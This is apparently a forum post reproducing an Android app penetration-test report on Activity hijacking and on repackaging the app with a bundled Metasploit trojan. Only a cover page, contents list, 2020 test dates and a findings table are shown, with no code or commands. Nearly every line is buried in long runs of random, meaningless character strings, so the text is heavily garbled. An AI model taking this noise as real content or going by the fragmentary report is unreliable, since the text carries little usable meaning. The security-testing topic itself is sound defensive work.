找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
返回列表 发新帖
查看: 5584|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
M8 A; k6 V# x8 b2 v 2 G" W0 x/ p3 I# }3 O" s3 v

- D" O& g7 _4 ~ ~- J _ , a0 R1 B( G8 m& R! ]
- \% } H4 R& O; D3 c- b3 D# R7 z9 Y

5 c, b0 v- p# {* y9 ~2 r [% T8 A+ T: B4 [
0 P, c& e0 M8 o* F8 x6 `5 U' s$ X5 T: |! x# T$ v; j

5 V( [) [8 Q! z5 Y: A1 Q! y $ |- o% _5 V6 _+ }9 R 文档编号:                ; A3 Y5 D* W# e + H* Y; g1 j4 w5 Y3 w

: A- D5 j7 f) L% b9 V 3 @; S9 X1 Z: c! W0 M' W% `

; u2 @5 u& \% F$ a) u" } c1 k$ g2 O# h; N; I   7 k9 _' t) F+ f; ^ ) r0 e0 @% v" x/ X

7 _/ J2 b7 I5 i, J6 {8 y" R; W: O! D; v' C* `1 P; ~4 g& P) U! W: ]

1 d0 B6 v c- _" g$ G) c+ B2 i1 {7 k- h$ g   5 [- a$ R$ X: Z/ j2 m ; e+ `; J% Y& q$ |6 ^. K

0 J) h( q: E ^3 M! v7 V* { , ?3 U0 {7 w6 d( Y) R- t/ n6 ]' R& j

" ~5 j6 F2 \" d; |; O ; a( I/ F) K: R9 ]4 A6 i; U   6 t8 a2 F- u: v' O9 U+ [ ! p& S0 J+ g! B# q! F! T2 \: x

2 H# @9 @. Q! p+ \& @ B ! a- R4 a, n1 H

% Z) ]6 N3 A$ {; q* V8 z, m4 C) Z & Z- A0 a0 @ b4 O( F* \; q, S   / z6 c1 L! m6 i) Z/ ^ 5 \2 z1 }$ n7 Q8 u% C+ w

9 x( w1 `" u Q | % |( W! v% _% y

. h. M2 a, u/ }2 ]% b $ {6 q6 U2 l7 c   ! F8 }4 \# j# f# N7 ^; r& X" ^5 _! t+ z. T' B6 g

2 d$ R1 O% ]+ K % t2 j$ p, U! w* e% T

8 B5 n1 r/ E% F3 Y0 m4 M/ P: u2 h- ?1 s 某某某APP渗透测试 / g/ x/ v m; B3 j! z 3 R. g5 ^$ L- m) n

$ _' G+ H0 G {8 m+ H " C- \. ?8 ^+ N2 A6 m8 X7 U8 M5 {1 U

' |: G0 D1 Z4 O " Q0 _5 e5 V! a" w( R" H   : ^/ B: |4 E, s% t( ~5 C+ T, h; @ - z5 }# o6 R* |; W

# i' h5 e* k4 l; {3 {8 g& ? 4 y7 _8 a$ n' R" s- |

7 X: j/ ?) P9 i! L# ?; }+ `. ~ & S6 [7 `( Z: {   ! A9 |/ f1 g$ h! B9 X( P , O. H( Q' p c/ {- o1 k$ T

* a" L: O) S4 } & x( v3 e# r' g: |- f3 m

# {* F- h) P% d3 ^, l3 d( B# D2 I2 D   7 C1 r" J& W7 p) b' M1 @# t3 q ' q% _9 f3 O$ `8 l3 U& t* D: y

4 {& G3 o( I; K, f, c, j% k( i* g' }$ r2 c4 G, ^% B9 X: m

1 @* h( P" k3 I( c9 n# ^ " ^1 ^5 m' Q) [7 f2 X" _$ L3 c   & v3 u! f7 R0 L; f! r& P, \& q7 T/ G/ Y: F8 E

. G! z5 H: s" i/ i$ p0 X0 `' x * n {( l0 o' j2 s, w

+ r/ h( \) B. F. a# _ ; b: f4 J* |, M2 U) T 技 术 报 告 , n2 E4 c6 ~$ I4 G! I& p % J3 P8 w/ o* ~! `2 r

4 Q2 R( a. t; s$ M/ v ' _$ c1 K a# [* c5 f& a

8 W( g2 N; C( G# C& n% B - i$ f) M; F$ s+ ^   2 R' C* `. A6 d6 N% t2 B+ R5 W- H ( T+ b" g7 o% [: Q* I% K8 j9 \

0 q; i# V p/ { ; _' y W" T0 n, }/ w' e

" l$ F2 c$ a4 E, h7 J' t . N0 m8 S$ {! Z& o0 `# k1 ]   & K) A& g- o- n' u0 d+ ]- l% e) t1 _ t. f: v" [

, q" d, k1 W9 I4 {$ s% O4 W& h' L2 K ! _1 f1 N8 W* \% U# u n. L, ^

8 ]% {" {( C4 g, f V 7 N, Y4 l0 W: n, _7 H" k9 f   3 c" q1 u: ~; M, O% B" @! t ) p' X5 P" J6 a0 `6 p A2 _/ ^' y

8 r5 s& e' [ B+ ]1 O+ g 8 q. K" ^; ?; z7 b8 ?

, ^* B' L r+ `7 G) g( H/ k; F# m# c% T/ [6 l% M   + ^% U$ _- A. ~) r# j1 z5 a % g* G& J6 {0 M- M- c

4 | H% _+ V) i7 d$ M( [2 S( g& r% e: Y4 _6 K9 G% o

' c' d3 z" i' `( @1 D ' b/ K M' ~; P9 ~: A5 ~! {   # m) s. Y/ [) F& f# g k 5 ?* m( L. }4 [) L4 U+ _

# V+ z6 J: x; B: F1 v, u0 F7 C$ q . s- a; c$ M3 B; E/ [

, P9 N1 n2 ?* p8 W) D0 h' U4 K7 G' \: J; E" K" X6 t9 H7 q, ^# q/ I   " M& B2 K6 v$ P / s; ^& ~& }, W0 T, J

! e$ {8 u7 U+ q+ J8 O5 D6 ~$ f/ j$ G- R) A: r+ H

; U; J# X/ }2 D # n R. C: h/ k' S   ; q5 H6 C+ @3 l , ]8 j# T' l2 K- x

! ~8 ]+ \" f/ d- A. K* H, {! E2 A' Q) ^0 p {! H

+ f$ s) L2 {4 H2 ~- t5 v) H 2 a2 ?. h: c% y   # x1 Q+ l0 ~9 \ o # @7 o& u1 ^3 O9 N' H) ^

% O3 s3 |( u7 J " l( |- K7 p: |( F; P

3 B) o0 L2 D9 U9 K8 x% z) T3 Y- S; p4 X7 e0 c2 G   . T+ Q7 _" b8 L% U5 F n , w1 Y+ z! N: L8 y% Z Z: p7 v6 w3 N1 J

* w5 o) Z& v) C% k ( M0 J2 F; [/ N7 Q$ }. w+ K+ X8 j

, Z* Q/ r9 X5 R8 y+ \2 m3 I% e+ I n: b! `4 {/ D   4 y6 c! J* C$ i/ e. ^ G V, |1 q

1 r; L- i) U+ Y# { x2 S1 c/ Z; G* Y, [& X! N$ ~

- v- ~$ H1 G1 B3 P 1 z- J+ e$ {( `- h   6 w0 _' y! `6 {! a( P ! v* x9 o, j: F

6 L) T5 Q0 L% X" v a* a/ a+ C& g, z( S6 g9 l

6 w2 u+ [/ g J4 @4 o ) ~" t: S$ z4 x/ Y/ q   # B9 b# s% ]& S1 {& {/ T, @* S5 Q" \ 5 K) X K, }5 a& R9 ], h- Q

% c7 w: K0 X6 [2 x; l! G ' ^4 r; W9 I$ {2 O% N) k

" n6 t9 {! w. }' }% O 7 J: Y' B; V8 w, n/ N   0 l! t" |4 W6 D 2 }% A0 I0 W2 I m( _% W" f- ~! K) j) l) }

5 P2 P3 Z) K5 h" Z9 N t # z" ^, E3 K; g% I! [5 g

$ d; n1 l' M: y 5 x- U/ i% J! T C- n" R   . A0 `! n+ F; h A7 @+ ^' [& N8 l I( ?$ D" \5 V

% x- e: f# P- s+ y- a5 n& j9 ~ 9 U) ^' ^3 ?% N% t2 I

0 \& |( S: p+ N3 W( M : \8 a6 x* E* Y4 @; i+ M0 u   O6 m% f0 p* o( p1 S% g 2 a8 {( u& I( r# t5 N4 T8 A

( M) z' B# X$ w6 g/ G4 D* a- Y& d2 J$ [0 ^/ C4 t0 O0 S

* Z6 e2 w! Q5 m9 }/ B1 H4 X/ E8 i# l& K' D+ H- C' \/ l& }+ E$ |   7 S/ @1 Z- j( o% m6 p0 r( p6 d: _& _6 t% H- K

4 E: ?" U' e4 n" o8 f% b $ f" y! }" Q/ K

, @4 O$ d3 D: [7 |% y% k* L. Q' @+ R: ?% `+ v8 O1 s4 e. p   0 h; L1 P0 ~1 J " @( E" H i% T. w4 J" ]

4 ~7 O/ b+ u- L) m8 A + ^& Y6 _+ c& r& a$ L! i" A9 P2 _; |

- b: C, y' I: q/ v+ S' \ 9 [! }; l; }! @+ C, V   $ P3 f( G- J( |$ {5 J. ?1 M8 N/ l5 x6 E: B

1 G! _! X2 @ ~3 `! d * y1 K3 h* J |. \

$ n ~& W+ C n& x" h5 [9 J- l. U7 `: ] G4 T' l7 D 二〇二〇年 1 n% j) X/ Z. g' J3 a& c. m $ ~8 Z# E5 \. A

% l9 a. c! ^+ Z( V8 i / V. ~/ F0 H# _2 |8 v" y
3 A8 g" _, n/ w3 J$ \6 [0 t 2 A3 @6 t$ C' E
/ S. ?+ a( ~" }) C" l# r# g% o ( U: N2 ^( p4 S* }" j) E! U- J + o, x! ^) C- Q" M0 Q1 K! Y F9 S% _7 _( ]) s1 r
& n/ O5 R/ C% {+ x6 ?9 v( J , z2 ?1 B: }) s+ |. t/ M1 a
1 e" Z; ]8 K/ Y6 Q& u( u, }( E2 Y3 P
4 y5 R) v+ r& u: f& K r+ j% m1 z ( i: P: {9 q& l4 x% j: z4 J % V& S i9 ~6 W8 W% m5 I : X( @2 @" x8 G$ U0 ~8 J" g
+ L% `1 v2 J# t' u 5 H; G; s: {" v+ @0 T

: q4 o# Z' q |$ F; L2 j " T @+ H2 T) u7 a+ w( m2 P8 h 目 录 - o/ k# u6 T$ d! @4 B, _6 ]9 o6 w 1 i6 s: O' R/ o7 r7 s& t! e

( c( ^0 W: d0 r n 5 I' h0 J H6 P( E/ I0 T ; T2 n1 p' ], i8 D1 T. g4 m. R " G+ [6 q1 C; c- x; `

8 p6 ^1 H( C1 w7 }' S% J4 y$ e6 r, ]7 l1 I   ' l9 l3 w* Y6 e, W6 z. [5 D# e3 r# u8 t6 D* p/ I# S

0 g) n$ [3 |7 [) e/ F6 `1 f( z) E4 G # _. F7 W) T) h" L. o1 |

+ U2 g4 w" t. `1 a# I0 ? t; n ' H( m0 U8 e/ w# B1 F4 _3 M6 h6 A 1 概述... 3 8 I; o0 m @7 X0 s6 m , W! R5 m4 w. {4 C1 L7 l7 D% R7 R

2 z z: D3 t+ c: A, H1 X5 } $ z7 V, [' ?+ W% K

: |* c& c2 L" p6 O8 I: W6 W6 U) o2 q8 M2 r 1.2测试时间... 3 1 J" i: ]1 i L2 I( \1 W% P4 b7 a % o+ c! z) _+ |. v

8 e, j9 \: g8 C" P4 g7 b 9 s2 l4 d' d3 i5 f! v a1 R7 z

" S# O' K# g3 v. X y5 i6 y* R 4 }9 W* S) V# B/ t: h m# s1 \ 1.3测试对象... 3 : Q0 t# X2 w, ]3 Z 6 p5 k/ b7 ]. E

, b; h i/ n0 Q/ T # o. o7 \& B; L

, Q: q) J$ V6 ~+ x R1 E& I) |; Z+ m, Q 1.4测试结果... 3 5 s: Q# l$ s. O, p* s @9 m, X6 z7 o) \5 i. D+ e& y

9 Z7 |( g5 K! Y 4 f1 `3 e% w" d: r

/ [3 D4 X0 O' E ~ 9 `1 c, }; {6 X. t( s6 y* Z 2 检测结果... 4 4 v+ c# o, z5 n$ X9 ?' ^0 l, b0 r$ l' Q3 m; v

: Z8 q! t( { b% p. f- } 6 R% b/ T# X8 @0 z

+ F }* n+ p) u- t2 g 5 ~$ J" d( ^5 }1 a+ ~4 w 2.1 某某某... 4 7 _' L/ ]2 L# k- {. n ( \% s7 x* f2 e3 [8 L

0 d8 Q. o8 n! U e; R7 D1 ~ A + l3 {% N- ~; A# x8 Z

2 O7 a) A: O" c $ B3 F$ b" q6 X, F 2.1.1检测目标... 4 % a# T: o$ \- _ 6 O3 Z F* W& i# R' k

* P; X8 I6 v/ c- ~! y2 s# C) q 2 P# h5 f% i5 t( E: D

) ]# D# c* n& e% U8 S/ B7 l( ]- H6 X/ g$ n; D: e. @# z 2.1.2检测结果... 4 0 ]/ j- g; i; q/ o/ F8 I ; X5 n3 T' B% D% H: _

$ ]" w$ c' Z4 x6 J* t! v B P ' `. A0 b; `" h' J/ O. A& r' D

" F; u4 o( a& o1 k+ j* I' b2 q j0 _/ v, v 2.1.2.1. 4 3 x% Q, d$ B2 k- g* I2 _ 9 m# a! X" ^2 \2 F" k; I+ f3 L% n

4 G d' Z/ |3 I/ C' m, z$ I# F( M, A6 [" ?! I) _! M, m

8 I$ {' Q; y7 i+ t+ L* E6 p7 M5 Q " W; _, I7 t) K+ Z( c5 @0 @0 v! I* U 2.1.2.2. 6 8 C+ `$ q. E- v; [9 B- I8 p# F ' M$ P! Q( }; k

, l* A+ X. l8 M+ ~' k - J4 V' y3 \2 N B" ~+ T6 z/ ]

8 A) }5 T# M4 a0 J6 ^" f7 j . ]5 k7 W+ `$ y/ o# V/ p% E6 u 5 v/ W" r$ O, Y# y7 n: i: X# L( ?1 g; q3 u6 D

* o* c8 A! I6 C# d8 k: g+ X l9 ^8 L5 q L% ?- e! |) M 3 S+ ~* l( Q( @. E4 t 7 X5 t/ p* K- W9 D6 \% D
# G1 m0 }9 w" q% p: ]* ?* Z $ H7 a" X1 C, C9 l* r% w$ N* @
# I' C2 E: U% t4 Q' N 4 X: e; {' ~5 m# h$ | 5 _& ~. V# D ^: G( [# v 1 v6 x' A* y2 p1 G. i/ P/ u

9 M& S/ s" U& M. s" D$ L3 s0 y : V$ l, Z# U- J! U 1 概述 8 s0 {3 C2 N/ i! K' L. O9 S 3 a7 Z' g2 P- E

; n y/ P( I' L" g+ X4 d! U- f2 X/ N6 F# t( z7 ]5 x; ~

0 F: B3 V- R+ |$ k8 `6 }) c( x % K+ L2 m) x! |6 ]0 S 1.2测试时间 * b# z% `' T6 @ 0 ?+ y) ^8 x/ F; v2 b

) q% b( h# H- p+ L, \* {( Z$ R, e% H% y# E! M) V2 H8 }# m3 v! O, L & o/ L a' @% G H% t5 H) E# {' y$ B7 P9 i! v) ] H: X2 Y" P) }* ]+ e8 J; h- m5 o; s+ R0 X2 @7 u. u, }; Q2 f8 l8 m% |; Z: V4 F) ^. l- ]) D& ^* J. F' a; }+ s2 Z3 b, [, \3 ]' _# E8 s4 J) X& I$ I% p9 Q h7 K2 d3 I# q1 A* t* z/ n, S' k; J. h" e! \2 T* }; \( H0 P0 ^) R3 h$ U. Z8 q" T3 r: {: q4 j3 c) \7 j+ R9 x# [1 J/ U8 h7 Z! H# ^- W. y8 `4 d. @3 Y! H/ h* O; B4 W( Z9 \( C: ]8 g3 Z: N* F5 e# d5 ?$ T/ {$ s4 y- o) t# e0 ] r) k. Y; `0 I$ Z, D5 I3 r: n2 @5 k' ]! [" } |; e# F1 ~4 L4 J3 I* I: R$ J; `/ `( D0 ~! `/ o" s2 ]" b' S; ^4 F/ O* w: G' f+ ~' j$ O. ^2 c) X! w0 c4 K- e; J$ N3 R# J4 y% A# q: ?' \! h# U0 \2 G, A+ C ^* w O' `% Y& l1 Y. [6 e3 U! U/ f7 p' x \2 o# O& \ t9 g' t) ]' ?: r f* C
* J$ H" a3 L7 `, e$ H( J* _$ r) m8 W; j! q9 l0 [# [

9 g+ R& m7 h7 u- ]# {" E; B 0 U1 {+ s Q& v7 v9 Q- n7 e4 a 渗透测试时间 ; D& d& Y" K( t; V: C5 d/ ^ 4 Z' l4 f! {& q' `1 H

4 |" \+ J/ A! R I, s V u ; G' F; _1 ^8 M% A
~- C V. T6 g! { . r! }8 {0 \" V' V8 {: I' ?7 x% f

$ a# G- ^7 U' N6 X4 G5 o l . X4 ^2 C( g x1 G 起始时间 - w. ]! R9 E: k. b m - U* T: u7 \- K9 T: [- J0 L. Q9 i

7 r \' h# r: } 2 c; [( I9 X2 ] 		( S, R. T; T0 E+ x- R7 ^ `6 [: K 5 b4 X( v, ]& K1 b! r+ I+ D+ [; ^

! @; x# J, b0 |; ]6 B0 |. B 2 h: v3 f+ e; q2 U8 Y 202046 / Y, W$ l, N% b8 s3 I5 X$ X/ @# Y1 f( I

; V3 q! G- {) }: u2 o8 M2 W- t% a W
2 W4 V1 i Z2 e" [+ e/ W 4 U& }( S" s0 w

" \# O ?+ D& {- j/ q 1 R. `7 u" i1 u 结束时间 . g9 p0 B5 X- p0 F 8 \6 t( F# a) e I

4 T' e5 x' w! U, V+ }! R2 W* v1 ?) ~ 		1 b( ]7 k: @' d4 q1 u/ j7 V% o & r3 T- @8 V8 i6 z

& _9 H9 W. r# d; M r7 V6 G 0 X+ g4 t( {5 e. ^1 \$ r/ s/ m- d 202049 2 {6 V* b. U& N% _ 1 j6 j& K: T# N" i3 F2 b

: B5 A' O- @. h7 I. n+ `7 g, s( w3 ~: D. Z3 u; z/ I4 e
' m5 a) C/ v; R: }$ T9 |& l7 J# v+ `+ W# I3 @( g! K$ [2 W

0 l% j1 B, K5 G& P h# v* {1 }8 R9 c 1.3测试对象 / ?4 a3 V4 B) X" p 6 k7 P! y! ]0 E, X- w3 T) j

% d3 A4 _. T" Y; I + Z$ |' r3 h! ]

1 `: k" i; A) k5 W, `; K6 C( ~$ |: o 9 a" R0 f8 X4 p" ?4 P 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: - E+ i* s! H; c0 f& u ' ]3 S' k$ [) y2 M

( u, ^, y5 M P! Y( \' O1 j8 M, c7 j5 K0 f, N: w

' E: X, d4 u2 J1 Y, A 5 ^# F0 k" B$ _- v* v: k7 M Z& c 1-1 检测对象 7 L+ f% c" f2 b9 G, N4 e0 w& r $ w) ~) j8 c4 q: j

N9 ?- v- L4 |2 R z F2 |$ t2 A! _1 i% k 4 h/ J0 L' D5 Q: y! {- v' N; A- J# p. K; b* N9 }! e( H/ m7 [3 k# n1 [5 f3 j' H; ~9 ?2 B. w7 g1 b' f# P: e; u2 h, z) C" l x+ c: |# h1 y U. W8 {5 s$ @2 ~# C0 @0 h5 ]9 ~0 z7 J, y( n& }: C3 X l/ C8 D' O. w( ]6 D+ ~, A9 c- r6 k3 d. ~. I$ o4 U( c. i3 _9 w3 r" \$ P! W. @ U6 m5 J) ~+ h% K* l0 b3 c/ S! d/ W1 X1 J3 [ J. A0 M1 g/ G$ d( }2 e& G2 f( R1 t% h' {- g4 V7 j s* W# u0 |! Y/ Z) a. [. O" {( I0 R8 U8 O* E8 d2 l$ }7 m2 M* g! ]# O1 s* y- P3 B* v3 R; z0 V$ d& Z8 X2 D L2 x7 q$ Z) D( ^, U/ i- p/ A3 I; r7 R# ?6 y- J) [" A! z# s$ Q, e/ ^$ V: d( w$ \' D% @) i" I5 Q3 A1 }5 Q6 s; H" o5 L3 q+ [8 d) b6 Y' F; X4 p' ?+ t9 l. T1 B0 r' w; `! e7 b! u- W6 |% ^2 u5 ?6 S) `$ o2 U$ {" r& k1 X
/ h; |$ w. V" t( W 4 z: @; f- G3 c

% c, J; e0 P6 i" ?* l: d/ i ' \+ z, T6 Y7 s3 w6 h1 ^ 序号 . P' f. q' d- r $ j) h9 z, [. u0 ]6 L/ p

' {, |9 `: r5 C4 _+ i( I; I2 ]$ P, j0 c; v 		9 X2 N4 M" G8 U1 h% R9 |& q4 P) h/ j v N0 H- O4 `

3 M4 V# m3 X2 d4 b4 {/ ]" [' T- y8 F8 I! o/ T# _ 测试对象 4 q5 o5 E& ~4 N+ \0 ]1 _( x8 i A( L R/ ^1 u5 ^( x+ v5 c

# ?, N2 W( [) X1 r% R' f2 D, g : Z( m) O' a2 y) Q0 E" \' j 		& o8 N$ ^9 M1 ?; k ) c% r" v; N! r' n

. j7 t& d9 B" b# r; Q" H: } , d3 o5 l3 R. l' D) m 测试地址 p: @ k. n4 r5 B* O$ K. z9 @ 0 j$ k7 B( ]) J" a c0 ]

( v7 S5 J# `! { J! @ ) ?* P2 R y; N; s) c 		; y0 u- T) v5 [1 o) x* \* t 3 f! ^8 X, R3 b& ], @# l% ^) D

4 f" v* k* O4 v2 d! a / |8 V4 m( k% C' H- m+ K0 G 安全漏洞 + F6 O9 X. V: S4 H( p : | a. F# n. Q. z0 R

4 Q2 ~. ?6 X) ^2 a4 p* L6 g- k: B
. e# `) {7 @7 y0 K 0 l X# v6 P/ {% u/ o4 l

* }* c: ?! T; D6 n0 X$ A 7 [, o$ \4 I. J* P9 I( `4 l3 L 1 5 o/ L: T8 B( j1 \ ; t2 I) \3 T: Y( y4 y* e" |& Z' ~

' E, ]& F5 e6 u- `5 k: x' r) K; G( y1 n4 M# O 		) k* a; Y0 W5 X6 V, m' M* ?1 X/ s. J5 t8 M& ^' B/ T( K

, Z; @, d( R9 U6 s4 Z6 Z1 H * q. O1 X, u) O& }- x 某某某安卓APP , r2 _5 }6 h5 \+ ~9 `" \8 @+ r2 x( h, A; D; S9 }7 C& a$ C

% T; H# r" Z; K0 v# Q( {# Y# R 		2 O) C) w7 J) b8 F+ B6 L ( W$ y& ?( c2 {* K- Y# c

0 w c) E+ o. O6 q T e a6 s' @# l- X& S7 V& r   6 h4 |, n, w& I$ l5 B* b, o% b; h0 G5 D$ ]4 t! o7 B3 B2 C

2 F/ a) K- ^# A% \& k" |5 [' [0 b, F8 {) }) o, S$ h 		- o, v$ ]2 P; x: B2 G+ V% p* V $ y: H- Q9 y, B6 s5 l

9 r' _/ I- ?. h3 ], |8 k$ n$ X, m" c 2 & ]6 k( |0 i) }$ `/ f1 k) H. Z2 K+ Y$ R$ e* C. n: m

$ v& m( c* ~, P' _, E* H2 E 5 L% |! ~ H: ]
- |3 |8 ~' @: ]+ E & s6 y4 b% p1 L- Z

: |7 ]$ e6 @2 }7 P! |% \' {* \" |" X * Q& D9 Q7 v+ ~% `4 |. v 1.4测试结果 ( t% J" A) F5 M1 r* L [ : _$ \# R. J8 o- m& a

0 n, B. s/ j6 q+ N" G. b" N * K( D/ W% L# _9 u1 f) ~

7 `3 L5 H/ C8 N$ h( I' a0 b2 q U6 H1 O# r- a z, L: j 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: # i9 I l. R/ t* X2 c: \1 K " U3 H2 P9 } j7 O L

' ~9 ~. U# O5 R X$ ~# c4 ? ! f/ F4 v* H/ b) g

. G; A& J# H# k+ `" A t* Z$ g2 _) i7 j) c   / d) B7 K! J; {; u }; e / J! |7 r! y/ ]: t

S7 ~) {; ]4 X% I 9 C/ M2 x, c: k# s; H4 M2 H
; v- }8 L/ t' C2 l) D9 M : I0 N& O' p$ H4 ~ t1 _8 h R $ D2 t% ?. ]6 G$ F: c/ Q' N. Y3 D& B9 _/ s& G! W" ?/ @2 k1 v8 Z: X% D# p K/ \* v* n; _ \0 e5 _7 p/ [9 O% b" {3 G, ^2 p Q9 y7 B2 B2 l5 e/ L3 |# i( I; L; |& N' [( ~' U9 Q( v( J' c4 `8 e: D6 A5 k4 w- }# V2 x8 y7 t. g) T* v1 K' V0 Z9 C2 B; V9 f: ^* `; _# n6 f2 x! e3 G! H2 ]3 d! i" k; L2 ^: i5 N& W0 @7 |% f7 u, X8 {* `9 b6 @ l! D1 A5 z* ^* l& e9 ~8 C* |* H8 n( @! n7 M6 y. l+ e( g0 o, b' _& w! F9 ?5 @/ E/ k$ K8 T- \. m" m" i/ ]6 o! W( ^/ P" ^" O( W8 k9 ^; Z9 c" y& p/ J4 a, o& b! n& F0 ?5 _6 g8 b7 M2 h& [$ H. S' H- F$ E; V! r: _7 J! y* V5 ]5 J; e! P: G; m C M0 [" Q! |9 g2 B' W4 F/ q4 y2 }* j# {4 v. Q+ H8 u7 G2 m: P- j& ]! Q+ r% r3 ?9 l# }. Y* `! f0 \/ p/ y' u( u4 D' c; J, [8 k0 W7 x2 D# a7 Q0 B7 ?' e/ }% V* z$ {! T* R/ G& K$ _( L- U% n% D4 R: e4 X. B- d# p4 |; i5 x* g8 ?) i% F" D4 U% s6 ]5 K6 h% f6 l: f m) \/ t- l; a; M Z4 ]: q; m5 a* L5 G3 j% r) |4 r" W8 s* r" [0 J! `7 Q9 t: U6 u( O* Y, G' w( N* ` s1 |1 @0 E2 \. W7 }- l- a& N4 Y5 ^; s" T k2 @' F3 D, J2 k F2 u$ t6 G1 C- W: O" U" [ [ h. g+ K- T3 n) P+ U" u' U5 E1 B6 C4 M3 @3 _ \' }: k! ~2 ^+ [1 t4 J, j2 R* t, ^( {8 U' w+ e. i7 n7 G) s2 r6 [. \4 b3 |9 I; g$ q; I; u2 M, T) [$ |0 z& D* P$ s9 H* U- c
6 P8 w" r1 Y) Q/ K; E3 i7 ^# j' _

2 j5 X3 h1 i8 `/ G% L; a8 l' d 9 R+ j) y* G1 u; {% \9 z 序号 1 o. w& n* |* A- T5 P $ t7 b- G* U' K6 c

( ?! E9 y- W" K; R( j( K+ p6 o$ J( D; D6 M% M4 C: e2 V 		1 q: H- |& s D6 l Q % ^3 w- s4 r% @7 _: a6 T

1 u; X. Y# ]3 ~; u* H. o ! h0 P0 u) A& w1 k2 z; | 系统名称 - M6 S1 K1 c! }( y 7 c! | c6 V* \+ `) t

# `; V4 y s, t1 A9 o, H1 l" g. |* h * F# O( `- o# }- g7 s 		' n8 ?$ N; p4 E0 T; t- |. C8 h; ?2 W ' u0 w O0 T. ~$ j

' @/ q2 M% o' R; Y0 d5 }/ t3 }: e B& D& o/ Y+ l2 O* e 漏洞名称 + i L6 V: b& m7 r- C ) H0 d' G5 [5 W5 o* q# |& k+ E, x

6 x" ]/ L9 I9 n/ c3 b4 e 4 V: G5 l& D( f 		: S, A2 i- d) q0 l( Q; B - Z( k- @) d7 d( x T' V0 u$ M# P

* U" y( w% ^# ` 6 j j3 M4 n/ n6 S 漏洞危害 ) H1 o& R$ g: v7 V/ A ) m' l0 _$ i8 l6 i1 U+ x6 u

8 W( Q" g7 s. g. K# X1 B8 {$ G6 Q b4 H5 u 		x. E! \3 `$ N( v& }' w. c 5 F# ]: L9 c& g- T; V$ p/ [

* [5 `2 G! M( d$ w) _6 M9 G. L# v; E% t3 M# Z 修复结果 5 l0 E! N. g8 p: x2 Q6 |# A3 ]6 \ % _$ n" X0 r; m9 G6 L. T9 ]

5 {9 ?2 I2 X. N- }2 m; O6 X0 P: a; H
# W) s6 \5 Q! S* ^8 f7 c4 W' S6 j / E& N2 Q( ^% m, K1 F3 I& u

5 g& S. D9 [8 v) p9 V$ O; @ 8 a# b( a4 H1 l) P( d 1 % A" o5 I9 |" D$ f1 ]% S% h% m& Y

: a% A9 Z* C. v& p2 a$ P, m/ r' q: ?' j+ i N% |; ]8 |- Z 		' j p, n1 I! f5 ^8 B # D3 m$ c# g3 J1 A6 K: c+ S

# w, ~0 [1 H( c, v$ W4 Z/ Y1 H8 L! U( Z% |3 o& ^' d2 }% ?. ^5 Y 某某某某某某APP 1 \, Q8 l0 k, F) G; D5 ?+ n0 n% o: ?. @$ D$ y

# {: q/ Z5 [& Y9 z4 I9 ?+ P 9 H1 ?3 z$ u; k/ Q% r3 r 		; }( N6 F; R% o) s2 N1 W+ l9 q' _. |* o: O- F2 O/ y/ l! N

8 |4 q6 V- |. {' E6 [ / V8 S- T* _3 M4 s Activity 劫持 1 [2 m2 }+ b! [2 x0 |4 p! w6 N. o6 m; U

& W' j' `, ]* O( f T- N1 a# B ) w" m) R) o: {1 s# H8 Q

" m6 M' R6 p* ~3 s$ V4 V* i; \ + S. ?% k+ v" I* O$ y   : V4 D l; i2 J, C ; |& ~# P* D, p3 f$ d" F

3 g( ]4 j8 h2 b" Q% |& ~' f 9 P& w- a/ \5 D: n* G) k$ k 		+ }, `" ^& U1 ?- {/ q8 N7 b6 }4 b6 B9 K+ L! x' J! e9 ]( E* l

: V( l+ |6 t1 I8 h1 ^/ n: [- ] , t, l+ x! _ U% g ' r3 X& L' g3 y+ i) g4 |' f 3 ~3 s, l5 E: [: i) k

9 r+ J& a1 f1 H2 V( W ( v( [* ^+ Z' n2 r" l, m+ R# d/ s 		( |3 T- ~ h7 G" \ 7 x* c3 v9 D' m' K5 O2 Q( D' a t4 j8 G

4 K3 P' x1 b0 ~3 l, J: k, [! R " h9 w2 A, d7 d; U2 g; F1 r   ! \) w$ y* Y6 a' P3 y) I 3 U/ K X5 O( W @1 r, J

0 U' p9 X9 I: _& K # X1 ~. T6 Q; F$ S$ F0 ^
( s& ^( A! X; T- ?$ m6 P3 f" L1 ]5 q+ }# O f# z6 p9 S

`3 p7 F% C4 a" `2 y3 Y- W% n 9 K# t! ~' ?6 w T) S 2 w0 X2 I: c C% ?6 h # T# _$ x$ e: ]) W1 S9 e

: E: h; ~ e; d' K+ e0 z 7 A6 R8 j3 w3 P/ Z2 R0 D( l% i 		. ^$ {: D! |1 m {* l7 Y9 I1 @ 9 T B6 {4 m+ U1 e- t: Q

- Y7 M& I1 c% Z) V6 \. T ( |7 n5 \3 c6 \/ s, Q) d 某某某某某某APP 8 @5 Y* a! A2 i & |9 _- _' H5 \7 ^* P) w

: o, l. \) |; u) V3 T2 G m7 S ( A2 E) V' {) N9 V( H+ J$ ? 		2 ~2 \9 J/ v$ A# P6 T* q5 B# z. V2 d* B( b9 r

0 W- f- D) G/ n0 k" J( u( x & W0 i" t9 C: |7 k3 m' h 反编译二次打包捆绑木马、篡改APP代码 + n0 O* M& t8 b6 c# ]) } & u, u, a( ~/ b9 f

; T1 v# }3 |. U0 G7 L2 `$ R& X , t' V/ e$ g! a% U1 r 		9 U ~& Y; c2 x9 t1 o' J# x8 f$ \2 y; d+ ]4 L7 ~7 M

9 ^+ M6 v& w# P, w8 f6 n- m6 a9 G ^/ v* b6 _- F# F% t) M$ k; {3 y 3 f9 l) Z( z8 ~# h" j) x3 m) T4 g8 x & |. l. m: ^' p @3 H

: d9 P- }0 A* x6 i$ v1 O8 Q2 h0 i3 R: S' h% v! ? 		* j9 t$ ], U* t' w) J0 { z4 u1 ]) }9 }: Z8 {

